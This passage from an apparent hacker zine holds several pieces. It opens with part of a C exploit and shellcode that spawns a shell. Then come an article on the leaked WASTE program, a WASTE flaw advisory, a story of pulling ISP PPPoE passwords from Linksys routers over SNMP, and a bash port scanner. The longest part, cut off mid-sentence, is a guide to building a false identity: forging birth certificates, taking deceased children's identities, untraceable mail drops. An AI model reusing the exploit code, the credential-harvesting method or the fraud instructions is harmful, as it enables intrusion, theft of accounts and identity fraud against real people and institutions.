tp++; } return t; } int main (int argc, char *argv[]) { // shellcode for Linux/x86 by Aleph Null char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char sploit1[2000]; char sploit2[100]; int i, ADDR_OF_BUF, *tp; printf("\n[*] vulndev2.c sploit by Doug Hoyte: www.hypervivid.com\n\n"); if (argc != 3) { printf(" Usage: %s \n", argv[0]); printf(" Offset should be the location in memory of the 'buf' variable\n\n"); return 0; } ADDR_OF_BUF = my_hatoi(argv[2]); printf("[*] Using offset %x\n\n", ADDR_OF_BUF); /* Remove the old log file */ printf("[*] Removing old log file 'db.log'\n\n"); unlink("db.log"); // Everything to 'a's memset(sploit1, 'a', sizeof(sploit1)); // Set BFP to point 2 bytes before F1 (so those damn semi-colons don't get in the way) *((int*)(sploit1+92)) = ADDR_OF_BUF-4-2; // The magic number for FILE structs on glibc is 0xfBAD! Dig? tp = (int*) (sploit1+96); tp[0] = 0xFBAD0101; // The FILE struct BS, we don't really care: we just want the ... for(i=1;i<40;i++) tp[i] = (int) (ADDR_OF_BUF+96+(40*4)); // ... jump table for(i=40;i<48;i++) tp[i] = (int) (ADDR_OF_BUF+96+(40*4)+(8*4)); // Tag the shell code on at the end memcpy(sploit1+96+(40*4)+(8*4), shellcode, sizeof(shellcode)); // Use arg #2 to point F1 to our FILE struct memset(sploit2, '\0', sizeof(sploit2)); *((int*)sploit2) = ADDR_OF_BUF+96; // There's a bad moon on the rise... printf("[*] Sploiting...\n\n"); execl(argv[1], argv[1], sploit1, sploit2, NULL); return 0; } --- sniff sniff drunk pony you're so gay, dec0de --- Waste - By son4r Wow.. My first ever attempt at writing a file.. And it's for the popular Nettwerked.Net K-1ine Zine! w00t! I'm 31336.5 all the way! Actually. I was recently playing with the "illegal" program WASTE accidentally leaked on to the net by Nullsoft, the crew that brought you Winamp and figured I could be the first to tackle an informative file on this super cool program. Okay I'm lying. I wanted to look cool by doing something neat for K-1ine! This article is to inform. Nothing more. Nothing less. -------------------------------------------------------------------------------------- Open your mind. Imagine a program so secure Governments could use it. The features of Waste are similar to those of file-swapping services such as Kazaa and the obsolete Napster, but the difference is that only small networks of users (up to 50, according to sources) can use it. Waste also offers encryption and authentication to prevent uninvited users from accessing the networks. Waste had been used internally to share files between AOL's San Francisco office, where Nullsoft is based, and its Dulles, Va., headquarters. For some unknown reason, AOL forced their Nullsoft unit to remove the program from the website and in place put up a notice basically stating that anyone who downloaded the software is to immediately delete any existing copies of it they may have. Unfortunately I have been unable to find a reason as to why AOL had Nullsoft remove the software. Popular software news sites have been unable to get comments from AOL represen- tatives. "NOTICE OF UNAUTHORIZED SOFTWARE An unauthorized copy of Nullsoft's copyrighted software was briefly posted on this website on or about Wednesday May 28, 2003. The software was identified as "WASTE" (the "Software") and includes the files "waste-setup.exe", "waste-source.zip", "waste-source.tar.gz" and any additional files contained in these files. Nullsoft is the exclusive owner of all right, title and interest in the Software. The posting of the Software on this website was not authorized by Nullsoft. If you downloaded or otherwise obtained a copy of the Software, you acquired no lawful rights to the Software and must destroy any and all copies of the Software, including by deleting it from your computer. Any license that you may believe you acquired with the Software is void, revoked and terminated. Any reproduction, distribution, display or other use of the Software by you is unauthorized and an infringement of Nullsoft's copyright in the Software as well as a potential violation of other laws. Thank you. Nullsoft" SET-UP: Although it's a pain in the arse to set up, if you do finally figure it out. This program is wonderful! This program sets up quite different from most normal Instant messengers or File Sharing programs. To start with, you are asked to generate a "User Number" by moving your mouse randomly around a box. Then you add the basics - a Username, a Real Name, your connection speed and a network name, which is needed to access other nodes on this network. The Next screen you see after that is the Private key Generator. You are prompted to enter a "pass- code" or password, and then the cool part; your encryption size. You can choose from 1024, 1536, 2048, 3072, 4092. The recommended is 1536. After you choose your encryption size, you have to randomly generate more numbers for the encryption. Then depending on the size of the encryption you chose, it will randomly generate your Private key and your public key. This is what the information for the username bob and the passcode Pink would look like with 1536 encryption: Key signature:87F5187E66B0EC49BBEFC5055D0E2EEEC6C58783 WASTE_PUBLIC_KEY 20 1536 bob CBE6D86D517A01C8188055679661C3A5839802461F31612B191EDA2FB159 BF8C99DD0BA6F3DDDFE685E222D44966DA36599BCA2E26C1DD5D4D659185 49C6A2E8360A4B5DB6C4A8EA61E83991F9C3894AA426FBD7DDE3C1AD2DD1 46D6153964036C93B7202003FA73461521DD93BE83AE7B0C7FA33B32EFE0 8D4CD90F42BC9E43E49FC09A0654860764734207F75304834869D8005E62 19D12E82B3D522F02BB8003A50AF78EF8C58A04365B2C6C088821EDD6357 89EC29E71746C5BE43E95DE10003010001 WASTE_PUBLIC_KEY_END After that, you can add public keys to your listing of users allowed to access you. Then you choose the download directory and the directory's that you want to share. Features: Public/Private IRC like Channels Person to person file transfers - Both upload and download - Users can upload files to another users computer. the default folder for this is Downloads in the waste installation folder - Users can download files from folders chosen by the user they are downloading off of. Multiple folders can be chosen and a very simplistic file browsing system is implemented. Instant Messaging - Users can talk privately to one another instead of being forced to use a public or private room The Help Menu: Commands: /msg Easy enough to understand /query Private messages just like IRC /whois Who is this user? Another IRC feature /join Self Explanatory /me Actions of course /search File Search anyone? /browse Self explanatory /leave Quit... I think it was So here you have it. Waste. Unfortunately because this is apparently "Illegal" and therefore it wouldn't be advisable for me to post a link to the source download. I can't give you a copy. But! I can give you something better. Go to http://www.google.ca and type in "Nullsoft Waste Download" and you'll find many different mirrors for you to download off of. Thank you and good night! [FIN] --- what was it like? what is voodoo machine like... it reminds me of tek wars :/ it's like, well it's like mexico city beggers. Except these beggers are wearing $1200 suits and they don't say please and thank you forgive my twisted metaphor --- % Waste Network Advisory % June 6, 2003 % jdm, j.miller@shaw.ca - Introduction For those of you who don't know, Waste is a secure P2P and chat client released by Nullsoft. Waste allows users to set their own network name, so that only other Waste users with both your key and the same network name as you. This function can provide some extra security, however it has one major flaw. If your network name is switched not only do you remain connected to your current network, you also connect to the newly specified network. All of the networks you are connected to are merged together, and users of both network will now be able to chat and share files with one another. This could possibly pose a serious threat to a business network if an employee were to change his or her network name allowing outside user to access whatever sensitive file being shared on the company network. ----- - The Problem Under 'file > options > network' one can change the name of his or her network so that he/she can connect to other users with his/her public key using the same network. Once connected to the specified network the user can chat and download files from all other users on the same network. If a user were to change his or her network name mid session, they would remain connected to the current network, and at the same time connect to the newly appointed network. The flaw in this is that both all networks that users is currently connect to merge together, allowing users of both networks to chat and share files with one another. Now any files that may have been "secure" within one network are now available to all other networks that any given user may be connected to at the same time. Fixing this mistake can also be troublesome. If you were to of made this mistake you will first have to change back to your old network name, and wait for any other users on the unwanted network to disconnect before the two networks will become individual again. PLEASE NOTE: There is no reason for a user to change his or her network ID while already on another network, unless the user is completely braindead or too lazy to create a new profile. If a user wishes to access more than one network safely, I suggest that he or she makes a seperate profile for each different network. A new Waste profile can easily be created by going to 'file > preferences > profiles > profile manager'. From there you can then make a new user and key. This new account could then be used to access a seperate network. ----- - The Solution At this point in time the only fix I can see is to disconnect from your current network before changing your network name, and to not share your network name with any troublesome users with your public key. And as mentioned above, I suggest using only one network ID for each user/key that you have created. ----- [Thanks to son4r & Debolaz for their help] --- dec0de - the mormon guys told me that Jesus was the savior, but when I asked "Savior of what..." they didn't respond. They just stared at me with a dopey glazed over look and smiled. --- Hack lynksys routeur pppoe by Dunter Dunter76@id.ru One newbies, one days tell me is over protected behind is router. After my scan with nmap, I just found SNMP open (port 161 udp). I scanned the MIB, and found some thing very interesting. on plages enterprises.3955.3.4.1.12.0 : the b1 enterprises.3955.3.4.1.13.0 : the password with SNSCAN from foundstone and SNMPWALK, in 15 minutes I found at least 200 access of sympatico, and commercial clients (unlimited bandwidth), sympatico.ca,qc.aira.com,bellnet.ca,bellnexia.net,on.aibn.com, etc.. Now it is more than 3 months later, and I tried to tell to Bell and Lynksys about the weaknesses, but they never returned my calls or even my e-mails. This bug is good for all ISP's with PPPoE on lynksys routers. Next time I will present 3 other bugs for sympatico and mc videotron, soon. -------------------------------------------------------------------------------- un gars me nargais et me disait qu'il etais blinder deriere son routeur. apres un scan avec nmap ,j'ai que trouver que le SNMP de ouvert(port 161 UDP) apres un ballayages du MIB jai trouver quelque chose de interessent. aux plages enterprises.3955.3.4.1.12.0 : le b1 enterprises.3955.3.4.1.13.0 : le password avec snscan de Foundstone et snmpwalk en 15 min jai trouver 200 acces sympatico. et meme les acces des compte commerciaux de bell(bande de debit non calculer). sympatico.ca,qc.aira.com,bellnet.ca,bellnexia.net,on.aibn.com, ect.. Depuit 3 mois jai avertit bell, et lynksys ,de leur faiblesses mais bon il semblerais qu'il ont autre chose a faire. ce problemes marche pour tout les ISP qui utilise PPPoE J'ai 3 autres bug pour sympatico et les mc videotron, avenir. - 06/03 --- # A simple (noisy!) TCP scanner. # call as 'script hostname [ tcp | udp ]' # #!/bin/bash for a in $(yes scan | head -1024) do (( start++ )) if [[ -n $(echo "" > /dev/$2/$1/$start && echo "up") ]]; then echo "Port $start" >> /tmp/scan; fi done; clear; cat /tmp/scan; rm /tmp/scan ~ Seuss --- just remember the power of voltron = wizbone_/#hackcanada tries it hurts to remember then forget the power of voltron and remember the power of grayskull it hurts to remember blast --- Identity New The US Government has long been aware that individuals are, for a variety of reasons, trying to create new identities. Criminals on the run from the police, debtors seeking to walk away from financial demands, fraudsters establishing new identities to commit crimes, absent fathers evading child support payments, ex-wives seeking to evade violent partners, ex-husbands seeking to evade large divorce settlements, etc. Twenty years ago, prior to the advent of computerization, there was little that could be done to combat identity changers. Such is the volume of work of government departments (e.g. over 5 million new Social Security Numbers are issued each year) that any elaborate form of checking individual cases would simply have brought the system to a halt. Computers are changing this - it is now possible to do crosschecking at the touch of a button. The main culprit here is the Social Security Number - this is now the standard means that both public and private agencies use for tracking people; eg, go into a bank and ask to open a new account, and as well as requesting some form of ID they will also ask for your Social Security Number which they will instantly check on the computer to see what information is held on you by credit reference agencies. The Government is engaged on a long term program of cross- referencing information between its various agencies, eg; the encouragement of states to cross-reference birth and death records so that birth certificates of now deceased people will be marked as such (thus eventually doing away with the old scam of getting a copy of a deceased child's birth certificate and using that to create a new identity). What does all this mean for the would-be identity changer? Simply, that if you do go ahead with changing your ID, you need to give each stage careful thought - thought as to how you're going to do it and thought as to how you are going to cover your tracks in case any stage of the process goes wrong (you don't want government agents on your doorstep asking why you're requesting a drivers license in a name other than your own). Which brings me to the Identity Theft and Assumption Deterrence Act of 1998. This is the first piece of legislation enacted for the specific purpose of deterring and punishing identity changers - these are its main points: - Identity theft (i.e. transferring or using another persons means of identification) becomes a crime, subject to penalties. - "Means of identification" is defined to include name, date of birth, passport, social security number, official state or government drivers license or state ID, alien registration number, and employer or taxpayer identification number. - The Federal Trade Commission is established as a clearinghouse to receive and process complaints, referring incidents to the appropriate authorities (eg credit reference bureaus or law enforcement agencies. What are the implications of this? Probably not a lot. They aren't going out proactively looking for identity changers. They are a reactive organization and will only get involved if someone does something stupid and catches the eye of someone in authority. However, more recently enacted legislation, the Internet False ID Prevention Act, has had a big effect. This federal law, which went into effect March 2001, makes it a felony for US based websites to offer templates (which would be downloaded over the web) to produce fake ID. Those who violate the Act could be sentenced to one year in jail even if their template is used only to make one fake ID, and up to twenty years if the template is used for more than five ID's. This has resulted in the virtual disappearance of all US based sites selling fake ID. There are still many sites offering fake ID but they are either based abroad or they are selling stuff that won't be a lot of use to anyone (e.g. European Student ID cards). How much time and expense is involved? This isn't something that can be done overnight. You need to allow a few weeks, mostly because you'll be dealing with government and state agencies by correspondence and at each stage you will have to wait for them to get back to you (eg, requesting a birth certificate - some vital records offices will oblige in a few days, some may take months). The cost isn't going to break you. Generally just a few dollars here and there in fees to the various state and government departments you'll be dealing with. Your largest expense is likely to be renting a suitable address or mailbox where correspondence can be sent. Access to a computer is useful (presumably you have that otherwise you wouldn't be reading this now) together with a good quality scanner and printer. The computer is first of all invaluable as a means to access all the information available on the web (and there is an awful lot of information). Secondly, you may well find it necessary to scan in and reproduce documents. Fake Documents and Second Passports If you have just read the above section (Legal or illegal?) you'll know that since the Internet Fake ID Prevention Act, which came into force March 2001, most US based fake ID Internet sites have shut down. The authorities are actively pursuing fake ID websites, and the penalties are harsh. The remaining web sites generally fall into two categories: 1. Sites that apparently offer a large selection of high quality fake ID. Usually based outside the US (often in the UK or Canada), these are often scam sites that will take your money and send you nothing, or at best send you some poor quality ID that will be of no use to you. Who are you going to complain to?! 2. Sites that provide bogus Employment ID cards or International Student ID cards. These may be useful as secondary ID, but nothing more. So, if you can no longer buy ID over the net, where can you get it? You really only have two alternatives: 1. Make it yourself. This is still possible if you have the use of a computer and a printer. All the materials are available and there is a wealth of literature available giving technical advice on how to go about it. 2. Buy from the street. There is a lot of fake ID available - the best places to look are college campuses or inner city areas in cities with large numbers of illegal immigrants. The obvious drawbacks here are that a lot of what you are going to be offered is going to be of very poor quality. The main problem with fake ID, however, is that it isn't verifiable. If you get stopped for speeding and produce a fake drivers license it will only take a few seconds for the officer to do a check and realize that your license is a fake. A more serious problem for the identity changer is the availability of hand-held verification machines - they're cheap (even nightclub bouncers are getting them) and easy to use (your ID is just swiped through it). Technology will increasingly be used by governments to fight fraud - more and more drivers licenses now have holograms on them. Holograms are not impossible to fake, but they add considerably to the level of skill involved and make it less likely that a forger would be able to reproduce a whole range of state and provincial ID as in the past. The US government is currently implementing a program to modernize passport issuing with a view to combating documentation fraud - this includes digitizing the passport photo to combat photo-substitution fraud (so that the original passport photo is available online to immigration officials to compare against the actual photo displayed in the passport). Plus, an electronic case management system is being developed to allow passport application clerks to view online any information they hold on applicants (e.g. those who have made false statements regarding previous passport applications), including images of birth certificates, etc. In reality, all this is probably some years away - apart from the practicality of implementing such a scheme, there are also cost and privacy issues. However, this isn't to say that fake ID is no use at all. There may be occasions when establishing your identity that fake ID may come in useful. For example, when requesting a birth certificate you may be asked by some vital records offices to supply a photocopy of your drivers license... which is where a fake one comes in useful (a fake license from a different state of course, more difficult for the clerk to query). Second Passports. You may have heard of people getting second passports and wondered what that was all about. It isn't directly related to getting a new ID but I'll mention it anyway. It basically means getting a passport for another country so that you can travel using this passport, open bank accounts around the world using it as ID, and maybe even reside in the country that issued this passport. So, if you're a US citizen and you're thinking that sounds good, here's the downside... Firstly, in US law you can't have a second passport because it means you've pledged allegiance to another country other than the US. If you take another passport you are theoretically supposed to give up your US citizenship. However, in practice this is not a problem simply because the US authorities will never know that you've got this second passport. So, lets discount this objection. No, the real problem lies in the fact that unless you're willing to spend hundreds of thousands of dollars you may be wasting your time... and here's why. These second passports are legitimate passports issued by bona fide authorities (or their agents) by actual countries, but the catch is that most of them are third world countries or developing countries (e.g., Belize, Columbia, Grenada - these countries do it quite simply because it's a useful source of income) where either you wouldn't want to live anyway or, more importantly, you will need to get a visa to travel to most of the countries you want to visit anyway on the passport (e.g. the US, Canada, Britain, France, Germany, etc). Getting a visa isn't a formality - it may involve an actual interview with an official at the local consulate of the country you wish to visit - if they have any doubts about you they won't let you in. But, like I mentioned, if you are prepared to spend a lot of money it may be worth looking into. It is possible to obtain citizenship of some perfectly respectable countries (e.g., Argentina, Ireland) by undertaking to invest a large sum of money in their economy (although be warned, this isn't an easy option - generally speaking, the more respectable the country the more likely they are to perform background checks on you to ensure that they are granting citizenship to a respectable person). If this is a route that interests you I suggest you do a search on the web - just search for "second passports" and you'll find numerous sites offering them. A little background research If you do intend to change your identity and you are not in any rush, I would suggest that you might want to spend some time looking at the study of genealogy (the process of tracing your ancestors). Maybe try and trace your own family back a few generations, finding their birth, death and marriage records. This will familiarize you with some of the processes involved, get you used to talking to clerks, etc, and maybe put you a little more at ease for when you start the process of creating a new identity. Establishing a Mailing Address Before you start the process of creating a new identity with new documentation you first of all need to set up an address where all your mail can go. This is so that there is no link between the old you and the new you. Firstly, if anything goes wrong during the creation of the new identity you want to be able to walk away from it, with nothing linking the scheme to you. Secondly, once the identity has been created you do not want to jeopardize it - you don't want someone from your past to come looking for you and be able to trace you. The traditional method has always been to rent a mailbox (cheap and easy). When corresponding with state and government departments it has always been possible to disguise the fact that you're giving a mail box address by giving the mail box number as though it were the number of an apartment or suite at the address (e.g. give the address as Suite 59, not Box 59). This is no longer possible. Under a new rule of the postal service, all mail to mailboxes will be returned to sender unless correctly addressed. This now means that the address has to include the letters PMB to indicate that you are writing to a mailbox. I do also suspect that some government departments are getting more suspicious when it comes to dealing with requests for documentation (the problem of identity theft, the events of September 11th, etc). This may make it just that little more difficult to request documents by post - for example, if you're requesting a birth certificate, and you send a money order for payment, using a PO box as an address with no phone number, then don't be surprised if you get no reply. There is every likelihood that those sorts of requests are going to be treated with suspicion and put to one side. So, what's the solution? The simplest course of action is to approach someone who rents out cheap office space. Tell them that you've got a small business but that you don't wish to give out your home address, so you're looking for a cheap alternative. Can you either rent a very cheap office or, better still, maybe they would be prepared to accept your mail in return for a weekly fee? Keep looking and you are sure to find someone willing to do a deal, especially if you are prepared to pay cash. This is important - you don't want to pay by credit card or check because it can be traced back to your old identity. You'll probably only need the address for a maximum of three months anyway to establish the new ID. If you get any mail after this you can always call in and collect it - when a lease is over, they don't usually mind you calling in occasionally to collect anything that may have come in. Or, how about this for a clever idea. Pick out a small local one-man business (for example a barbers shop) and post a letter there. Call in a few days later and explain that you've just moved into the area, and that you've accidentally given the wrong address to a couple of people... sorry for any inconvenience, but would it be possible to call in and collect any other mail that comes? If he says yes then you've got your mail drop, free of charge and with absolutely no way of tracing you. Just as a matter of interest, if any of you out there are worried about going to collect the mail from your mail drop, because you're expecting a dozen law enforcement officers to grab you and throw you to the ground because they have discovered your little scam, then don't worry. With police and government resources being limited, firstly they generally only go after people if a large amount of money is involved, and secondly they never ever waste time on speculative surveillance operations again unless a large amount of money is involved and thirdly, cases like this very often involve problems of jurisdiction (you may be requesting documents from another state or even another country). I'll tell you a little story, which alerted me to the attitude of the police. It surprised me at the time because like most people, I had little dealings with them (nothing more than the odd parking ticket), I was very law-abiding and tended to assume that the police were all powerful, all seeing, the guardians of law and order, etc, etc. I worked in a cellular phone store a few years back and as you must be aware, before you can have a phone on a monthly price plan you need to be credit checked. We credit checked a middle aged man, and he passed the check. We filled out the airtime agreement there and then (plus taking photocopies of his proofs of ID), and he said he'd call in the following day at 2pm and would actually take two phones (this wasn't unusual, men would often get a second phone for their wife). The following morning one of my assistants in the store was going through the paperwork, preparing this mans phones for collection. I can't remember now what the discrepancy was, but she noticed something amiss - something aroused her suspicions. So, on her own initiative she phoned the mans bank (we had his bank details on the airtime agreement). The bank immediately confirmed that the man was a fraudster - he got a stolen checkbook and ID, and they'd had numerous dud checks from him. So it was agreed with the bank that we would contact the police and that hopefully they would be able to come down and wait for him to appear at 2pm. You'd think nothing could be simpler, but I was wrong. I phoned the local cops and explained the situation to them - complete disinterest was how I would summarize their response. As far as they were concerned, no crime had yet been committed, and if there was a crime it wasn't a particularly serious one, and even though the man had very conveniently given us the time he expected to be in our store, this couldn't be guaranteed, so from their perspective the whole thing was possibly a waste of their precious time (I should also point out that the police station was only 5 minutes from the store). At this time I was in another of our stores, but I relayed this conversation to the two girls who were working at the store where the man was due to come in later that day. The girls were understandably surprised, and also shaken, because of course it meant that they would have to face the man on their own - it would at the very least be unpleasant. After putting down the phone from talking to me, one of the girls had the presence of mind to call the bank back and explain the situation to them. The bank were also surprised at the response of the police - however, they knew that there was already an ongoing police investigation into this man because of previous check frauds. They were able to contact the appropriate police department and the man was subsequently arrested that afternoon in the store. Phone Number. When dealing with state and government departments they often request a contact phone number. You've got two options here. You can either rent a secretarial service, so that your "office" will answer the phone and take a message for you. This is relatively inexpensive (usually it's charged by the month). You can simply ring in each day to check if there are any messages for you. Alternatively, a recent option is a mobile phone on a pre-pay scheme. It's now possible to buy a mobile phone without a contract and pay for the usage by purchasing monthly airtime vouchers. This means there is no annual contract so you don't need to be credit checked, which is important because you don't want to give your actual name and address. They still may ask for some ID (this will vary depending on the company) - but it's probably nothing you couldn't get round with some false ID. FORMS OF ID (USA) A. Birth Certificate B. Social Security Number C. Drivers License D. Passport A. Birth Certificate Before going into detail about birth certificates it's probably worthwhile to take an overview of the whole system so that we can see what we are dealing with. The great advantage for the identity changer is that the whole system is decentralized. It's developed over the years at local level, with little attempt to standardize across the nation. The government is aware of the limitations of the system, particularly the ease with which certificates can be fraudulently obtained or reproduced, but there aren't any easy solutions for the government. Here are a few facts: 6,422 different entities currently issue birth certificates 14 states allow open access to birth certificates (California, Iowa, Kentucky, Maine, Massachusetts, Minnesota, New Jersey, North Carolina, Ohio, South Dakota, Tennessee, Vermont, Washington, Wisconsin) Over 14,000 different versions of birth certificates are in circulation Federal and state agency staff have only limited training to detect fraudulent certificates Birth certificate fraud is seldom prosecuted unless it can be linked to other large dollar losses or other punishable crime In 28 states birth certificate fraud remains a misdemeanor The majority of states have a decentralized approach to issuing certificates, relying on local offices over which they have little control. Only 11 states use a centralized operation for issuing certificates. The sale of certificates serves as a source of revenue (in some cases the only source of revenue) for state health departments, so there is little incentive for restricting their sale. A 1999 statement from the Office of Passport Policy, Planning and Advisory Services before the Subcommittee on Immigration and Claims Committee on the Judiciary US House of Representatives reported the following: "The integrity of birth documentation and the potential for fraud are of great concern to us. An individual's US certificate of birth is primary evidence of citizenship. When an individual born in the United States applies for a passport for the first time, the evidence of citizenship presented is usually a US birth certificate. We need that document to be reliable because, after the first application, the passport itself is used as evidence of citizenship. If a US passport is issued on the basis of a counterfeit or altered birth certificate or a genuine birth certificate presented by an impostor, the original evidence may never be examined again and the problems are compounded." "There are many thousands of offices nationwide authorized to issue certified copies of US birth certificates, which come in hundreds of different formats. These include long-form birth certificates issued by state, county or municipal entities, as well as shortened versions, called abstracts, or transcriptions, which contain only limited information. We have also seen wallet-sized versions. Format changes are plentiful. They reflect new issuance procedures, new paper stock, or a newly appointed registrar. To further complicate the matter, some states issue local birth certificates to children who have been born abroad and adopted by US citizens, in addition to birth certificates amended to reflect domestic adoption. States also issued delayed birth certificates, on the basis of an oral declaration only, often years after the alleged birth. An example is a case of a foreign couple who were able to obtain a two-year delayed birth certificate, on the basis of an affidavit, for a baby who they claimed had been born in a hotel room while they were here on vacation, with no witnesses other than the alleged father, who just happened to be an obstetrician, and no outward signs of birth left in the hotel room. The parents claimed to have returned to their homeland the day after the alleged birth, leaving the baby with an acquaintance for the next two years. As you can see, the potential for fraud is very real." "Furthermore, birth certificates can be falsified with relative ease, with widely varying degrees of quality and sophistication. At the low-end, we see photocopies of legitimate birth certificates with the original name deleted with typewriter correction fluid and a new name typed over. These types of documents are generally purchased from a street-level vendor, exploiting migrant workers and uneducated aliens. However, any individual can produce such a document." "At the high-end, we see computer-generated copies of birth certificates using virtually the same ink, paper, and printing fonts as a legitimate birth certificate. While these can be detected in the passport application process, it requires extensive research and checks of records in the jurisdiction which would ordinarily issue the legitimate certificate." "In many instances, legitimate birth certificates are purchased from US citizen accomplices. To cite one example, the Department's Diplomatic Security Service, which has statutory authority to investigate passport fraud, recently had a case of an alien-trafficking operation that recruited American citizens (out of a methadone clinic) to obtain and sell their birth certificates. The birth certificates were then used illegally for a number of purposes - the primary one being application for a US passport." "Additionally, fraudulent applicants are able to obtain the legitimate birth certificates of deceased persons because some states do not cross- reference the records of birth and death. Many states participate in a voluntary interstate program to exchange information when an individual aged 45 and younger dies. Even in states that cross-reference internally and share information with other states, limited personnel resources may mean that records are not cross-referenced immediately upon receipt of death notification. The speed at which records can be cross-referenced is important because impostors are prepared to take advantage of any lag- time between a death in one state and its recording in another state. We have seen cases where an individual born in one state is killed in an accident in another. Someone spots the obituary, gets a copy of the birth certificate, obtains identification under the new identity, and applies for a passport - all before the death record is filed in either state." "The State Department considers the more than 4,000 passport acceptance officers nationwide to be our first line of defense in detecting fraudulent documentation. We have training programs to alert them to possible impostor fraud, and we ask them to report suspicious behavior to the passport agencies. There is a Fraud Programs Manager at each of the 14 passport agencies. When there is a question about a birth certificate or other document, our Fraud Program Managers routinely contact the office that purportedly issued the suspect document." The birth certificate is the foundation document of your identity - from this flows all other documents. It is therefore imperative that you concentrate your efforts on making this document as authentic as possible. There is a lot to learn here, so I have broken it down into different sections to make it easier to understand: (a) What kinds of certificate are there? (b) Requesting a copy of a birth certificate. (c) Does everyone have a birth certificate? (d) How do I create an authentic birth certificate for my new identity? (a) What kinds of certificate are there? (1) Hospital birth certificate (2) State issued certificate (3) County issued certificate (4) Baptismal certificate (1) Hospital birth certificate. This certificate is issued either by the hospital where the birth takes place, or by an attending doctor or midwife if the birth occurs outside of a hospital. It is an official and legal document. It records the name and location of the hospital, the child's name, sex and time of birth, the parent's names and ages, and the signatures of the attending doctor and a witness. Plus, usually the hospital's seal is on this document. The original copy is given to the parents and a photocopy is sent to the county records office. This photocopy is usually destroyed once the birth has been recorded by the records office. The system sometimes breaks down when the birth takes place outside of a hospital. The hospital type birth certificate is still issued, but it is not uncommon for a copy of it not to be sent to the county records office, so that the birth is never officially recorded. The doctor or midwife will issue a certificate to the parents, requesting that they take the certificate to the records office to officially record the birth, but the parents never get round to doing it. Finally, of course, remember that any copy of an adult's hospital birth certificate will now be old. They are only issued at the time of birth to the parents, and the authorities do not keep copies to allow for requests to be made for additional copies later on (because theoretically there's no reason why anyone should require a copy because they should also have been issued with a state or county birth certificate). However, because so many people only have a hospital certificate and no state or county one, then state and federal authorities will usually accept a hospital one as being valid. This is of interest to potential document forgers because hospital certificates are more difficult for the authorities to verify because not only does the certificates appearance vary from hospital to hospital, but also more importantly, unlike state issued certificates, they do not have any unified system of numbering so that their validity cannot be instantly verified. Plus, you can always produce a certificate from a hospital that is now closed, making it impossible to disprove, as long as the certificate has been "aged" to make it look old. (2) State issued certificate. Issued by the Bureau of Vital Statistics at state level. All states issue their own certificates and so they differ in appearance from state to state, and of course the designs are also sometimes changed over the years. All state certificates have a state birth number (based on a standardized system used nationwide) that the authorities can verify (the number shows the state of birth, the year of birth, and a random number). However, it should be remembered that in the general course of events, unless your faked document arouses suspicion in some way, no attempt will be made to verify it by any department that is accepting it from you as proof of ID (this is because of the additional volume of work that would be entailed, limited resources and even privacy considerations). The state birth number makes producing fake state birth certificates difficult, which is why most fake ID companies will send you a hospital type certificate if you request a birth certificate. A state issued birth certificate could be old or new, issued shortly after birth, or a recently requested copy. A requested copy of a birth certificate from a vital statistics office, the quality of the copy will differ considerably from state to state dependent on how they keep their records. It could be a poor quality photocopy or a high quality printed version. (3) County issued certificate. Issued at county level by the county health department, county registrar or public records office. The appearance of certificates differs from county to county, even within the same state, and also from year to year as designs change. The certificate will have a locally issued number on it - not instantly verifiable like the state type, but still capable of verification if someone were to contact the records office. Again, like at state level, a county level certificate could be old or new. Old if it was issued shortly after birth, new if it is a recently requested copy. Recent copies, like at state level, can be poor quality photocopies or high quality printed versions. (4) Baptismal certificate. Not an actual birth certificate, but often accepted as such by the authorities in the absence of any other form of birth certificate (which is not uncommon). To be acceptable as valid it must contain the location and date of the birth, the location and name of the church, the date of baptism, the names of the parents, the signature and stamp or seal of a church official, and the baptism must have taken place within a few months of the child's birth. Any adult's baptismal certificate will be quite old. Similar to hospital certificates, no new copies of old certificates are ever issued because there is no reason why anyone should ever require a copy of their baptismal certificate. Again, like hospital certificates, the baptismal certificate is often faked because it is very difficult to disprove its validity, particularly if it has been "aged" to look old. (b) Requesting a copy of a birth certificate How easy is it? It varies from state to state, county to county. Theoretically, birth, death, marriage records, etc should be available to the public, however this is no longer always the case. The authorities, alarmed by the number of people accessing records with criminal intent (eg for welfare fraud, particularly in large cities like Los Angeles) are making access to records more difficult. When applying for a copy of a birth certificate the office may stipulate that it will only supply a copy to the actual person themselves, or to an immediate relative, verified by supplying a photocopy of a drivers license (this is where a fake license can come in useful). Where and how do I apply for a copy of a certificate? You can either apply at state level or county level. Its probably a good idea to apply at both levels because you won't know how long it's going to take and whether your application will run into any difficulties. Generally its easier to deal at county level - they tend to be a little more informal. You'll have to mail in a request form, together with a small fee. Very often you can download and print off a copy of the form because many statistics and record offices have web sites. Sometimes you can get away with just sending a letter and the correct fee to a county office (like I said, they tend to be more informal) which is good because it means you don't have to give as much information. They will want to know why you are requesting a copy of a birth certificate. Common reasons are for legal cases, genealogy, or to be submitted to the government as part of your security clearance for a new job. Your only problem here is that unless your request appears urgent you may find you have to wait a long time (weeks or even months) for your copy. If you are in a hurry, some offices offer a speedier service with delivery by courier for an additional payment. (c) Does everyone have a birth certificate? Surprisingly, some people have no birth certificate at all, because their birth was never officially recorded by the state. Parents with strong religious beliefs frequently did not record births, or as mentioned, when children were born outside of a hospital the doctor or midwife would have issued a certificate (see "Hospital birth certificate") but the birth was not recorded at county or state level, plus the certificate issued by the doctor or midwife may have been lost leaving no record at all of the birth. (d) How can an authentic birth certificate be created for my new identity? Now we know a little of how the system works, let's look at some different methods: (1) Producing a fake birth certificate. (2) Borrowing the identity of a deceased child. (3) Delayed record of birth - convincing the administration that your birth was never officially recorded. (1) Producing a fake birth certificate Creating a completely new identity using new details (so you get to choose your own name, date of birth, etc). This process involves getting hold of some authentic birth certificates (so that you have a basis to work from) and using the desktop publishing facility on a computer, producing a fake certificate with your own details. Firstly you need to decide the type of certificate to reproduce. We know there are basically four types of certificate (see (A)(a) "What kind of certificates are there?") - hospital, state, county and baptismal. I would have reservations about reproducing a state certificate - physically, it's no more difficult to reproduce than any of the others, but a drawback is that you are not going to be able to put a state birth number on it which is going to be 100% verifiable, although as previously mentioned, this is not necessarily a major problem - government departments do not automatically verify documents sent to them as proof of ID unless there is something about the document that leads them to suspect that it may be a fake. However, if you do want to reproduce an actual state certificate, I recommend that you get an actual copy of a birth certificate from that state and change all the names and family details etc, but retain the state birth number, sex, the county 